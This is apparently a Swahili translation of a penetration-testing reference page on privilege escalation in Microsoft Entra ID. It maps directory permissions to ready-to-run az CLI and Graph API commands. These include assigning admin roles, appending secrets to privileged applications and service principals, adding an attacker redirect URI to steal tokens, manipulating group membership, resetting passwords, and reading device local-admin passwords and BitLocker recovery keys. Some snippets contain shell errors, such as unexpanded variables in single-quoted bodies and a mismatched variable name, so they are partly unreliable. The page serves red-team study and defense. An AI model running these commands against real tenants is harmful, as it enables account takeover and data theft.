Az - EntraID Privesc

Reading time: 12 minutes

Majukumu

Jukumu: Msimamizi wa Jukumu la Kipekee

Jukumu hili lina ruhusa za granular zinazohitajika ili kuweza kupeana majukumu kwa wahusika na kutoa ruhusa zaidi kwa majukumu. Vitendo vyote viwili vinaweza kutumika vibaya ili kupandisha hadhi.

• Peana jukumu kwa mtumiaji:

# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

• Ongeza ruhusa zaidi kwa jukumu:

# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'

Maombi

microsoft.directory/applications/credentials/update

Hii inaruhusu mshambuliaji kuongeza akiba (nenosiri au vyeti) kwa maombi yaliyopo. Ikiwa ombi lina ruhusa za kipaumbele, mshambuliaji anaweza kuthibitisha kama ombi hilo na kupata ruhusa hizo.

# Generate a new password without overwritting old ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwritting old ones
az ad app credential reset --id <appId> --create-cert

microsoft.directory/applications.myOrganization/credentials/update

Hii inaruhusu vitendo sawa na applications/credentials/update, lakini imepangwa kwa programu za mkurugenzi mmoja.

az ad app credential reset --id <appId> --append

microsoft.directory/applications/owners/update

Kwa kujiongeza kama mmiliki, mshambuliaji anaweza kubadilisha programu, ikiwa ni pamoja na akiba na ruhusa.

az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>

microsoft.directory/applications/allProperties/update

Mshambuliaji anaweza kuongeza URI ya kuelekeza kwa programu zinazotumiwa na watumiaji wa mpangilio na kisha kushiriki nao URL za kuingia zinazotumia URL mpya ya kuelekeza ili kuiba token zao. Kumbuka kwamba ikiwa mtumiaji tayari alikuwa amejiunga na programu, uthibitishaji utaenda kiotomatiki bila mtumiaji kuhitaji kukubali chochote.

Kumbuka kwamba pia inawezekana kubadilisha ruhusa ambazo programu inahitaji ili kupata ruhusa zaidi, lakini katika kesi hii mtumiaji atahitaji kukubali tena ombi linaloomba ruhusa zote.

# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the configured ones)
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback"

Service Principals

microsoft.directory/servicePrincipals/credentials/update

Hii inaruhusu mshambuliaji kuongeza akidi kwa huduma zilizopo za huduma. Ikiwa huduma ya huduma ina mamlaka ya juu, mshambuliaji anaweza kuchukua mamlaka hayo.

az ad sp credential reset --id <sp-id> --append

Ikiwa unapata kosa "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." ni kwa sababu haiwezekani kubadilisha mali ya passwordCredentials ya SP na kwanza unahitaji kuifungua. Ili kufanya hivyo unahitaji ruhusa (microsoft.directory/applications/allProperties/update) inayokuruhusu kutekeleza:

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

Hii inaruhusu mshambuliaji kuongeza akidi kwa huduma zilizopo. Ikiwa huduma hiyo ina mamlaka ya juu, mshambuliaji anaweza kuchukua mamlaka hayo.

az ad sp credential reset --id <sp-id> --append

microsoft.directory/servicePrincipals/owners/update

Kama ilivyo kwa programu, ruhusa hii inaruhusu kuongeza wamiliki zaidi kwa huduma ya msingi. Kumiliki huduma ya msingi kunaruhusu kudhibiti akidi zake na ruhusa.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

microsoft.directory/servicePrincipals/disable and enable

Hizi ruhusa zinaruhusu kuzima na kuwezesha wahusika wa huduma. Mshambuliaji anaweza kutumia ruhusa hii kuwezesha mhusika wa huduma ambaye anaweza kupata ufikiaji wa namna fulani ili kupandisha hadhi.

Kumbuka kwamba kwa ajili ya mbinu hii mshambuliaji atahitaji ruhusa zaidi ili kuchukua udhibiti wa mhusika wa huduma aliyewezeshwa.

# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

Hizi ruhusa zinaruhusu kuunda na kupata akreditif za kuingia mara moja ambazo zinaweza kuruhusu ufikiaji wa programu za upande wa tatu.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Applications Privilege Escalation

Kama ilivyoelezwa katika hiki kipande ilikuwa ni kawaida sana kupata programu za default ambazo zina API permissions za aina Application zilizotolewa kwao. API Permission (kama inavyoitwa katika Entra ID console) ya aina Application inamaanisha kwamba programu inaweza kufikia API bila muktadha wa mtumiaji (bila mtumiaji kuingia kwenye programu), na bila kuhitaji majukumu ya Entra ID ili kuiruhusu. Hivyo, ni kawaida sana kupata programu zenye mamlaka ya juu katika kila Entra ID tenant.

Basi, ikiwa mshambuliaji ana ruhusa/majukumu yoyote yanayoruhusu kusasisha akidi (siri au cheti) cha programu, mshambuliaji anaweza kuunda akidi mpya na kisha kuitumia kujiandikisha kama programu, akipata ruhusa zote ambazo programu ina.

Kumbuka kwamba blogu iliyoelezwa inashiriki baadhi ya API permissions za programu za kawaida za Microsoft, hata hivyo muda mfupi baada ya ripoti hii Microsoft ilirekebisha tatizo hili na sasa haiwezekani kuingia kama programu za Microsoft tena. Hata hivyo, bado inawezekana kupata programu za kawaida zenye mamlaka ya juu ambazo zinaweza kutumika vibaya.

Groups

microsoft.directory/groups/allProperties/update

Ruhusa hii inaruhusu kuongeza watumiaji kwenye vikundi vyenye mamlaka, ikisababisha kupanda kwa mamlaka.

az ad group member add --group <GroupName> --member-id <UserId>

Kumbuka: Ruhusa hii inatenga vikundi vya Entra ID vinavyoweza kupewa majukumu.

microsoft.directory/groups/owners/update

Ruhusa hii inaruhusu kuwa mmiliki wa vikundi. Mmiliki wa kundi anaweza kudhibiti uanachama wa kundi na mipangilio, na hivyo kuongeza mamlaka kwa kundi.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Kumbuka: Ruhusa hii inatenga vikundi vya Entra ID vinavyoweza kupewa majukumu.

microsoft.directory/groups/members/update

Ruhusa hii inaruhusu kuongeza wanachama kwenye kundi. Mshambuliaji anaweza kujiongeza mwenyewe au akaunti mbaya kwenye vikundi vyenye mamlaka ambayo yanaweza kutoa ufikiaji wa juu.

az ad group member add --group <GroupName> --member-id <UserId>

microsoft.directory/groups/dynamicMembershipRule/update

Ruhusa hii inaruhusu kuboresha sheria za uanachama katika kundi la dynamic. Mshambuliaji anaweza kubadilisha sheria za dynamic ili kujumuisha mwenyewe katika vikundi vya mamlaka bila kuongeza wazi.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Kumbuka: Ruhusa hii inatenga vikundi vya Entra ID vinavyoweza kupewa majukumu.

Privesc za Vikundi vya Kijadi

Inaweza kuwa inawezekana kwa watumiaji kuongeza mamlaka kwa kubadilisha mali zao wenyewe ili kuongezwa kama wanachama wa vikundi vya kijadi. Kwa maelezo zaidi angalia:

Az - Dynamic Groups Privesc

Watumiaji

microsoft.directory/users/password/update

Ruhusa hii inaruhusu kurekebisha nenosiri kwa watumiaji wasiokuwa wasimamizi, ikiruhusu mshambuliaji mwenye uwezo kuongeza mamlaka kwa watumiaji wengine. Ruhusa hii haiwezi kutolewa kwa majukumu maalum.

az ad user update --id <user-id> --password "kweoifuh.234"

microsoft.directory/users/basic/update

Hii ruhusa inaruhusu kubadilisha mali za mtumiaji. Ni kawaida kupata vikundi vya dinamik ambayo vinaongeza watumiaji kulingana na thamani za mali, kwa hivyo, ruhusa hii inaweza kumruhusu mtumiaji kuweka thamani ya mali inayohitajika ili kuwa mwanachama wa kundi maalum la dinamik na kupandisha mamlaka.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Sera za Ufikiaji wa Masharti & Kuepuka MFA

Sera za ufikiaji wa masharti zilizowekwa vibaya zinazohitaji MFA zinaweza kuepukwa, angalia:

Az - Conditional Access Policies & MFA Bypass

Vifaa

microsoft.directory/devices/registeredOwners/update

Ruhusa hii inawawezesha washambuliaji kujitenga kama wamiliki wa vifaa ili kupata udhibiti au ufikiaji wa mipangilio na data maalum za kifaa.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/devices/registeredUsers/update

Ruhusa hii inawawezesha washambuliaji kuunganisha akaunti zao na vifaa ili kupata ufikiaji au kupita sera za usalama.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/deviceLocalCredentials/password/read

Ruhusa hii inawawezesha washambuliaji kusoma mali za akauti za usimamizi za ndani zilizohifadhiwa kwa vifaa vilivyounganishwa na Microsoft Entra, ikiwa ni pamoja na nenosiri.

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerKeys

microsoft.directory/bitlockerKeys/key/read

Ruhusa hii inaruhusu kufikia funguo za BitLocker, ambazo zinaweza kumruhusu mshambuliaji kufungua diski, na kuhatarisha usiri wa data.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Mamlaka Mengine ya Kuvutia (TODO)

• microsoft.directory/applications/permissions/update
• microsoft.directory/servicePrincipals/permissions/update
• microsoft.directory/applications.myOrganization/allProperties/update
• microsoft.directory/applications/allProperties/update
• microsoft.directory/servicePrincipals/appRoleAssignedTo/update
• microsoft.directory/applications/appRoles/update
• microsoft.directory/applications.myOrganization/permissions/update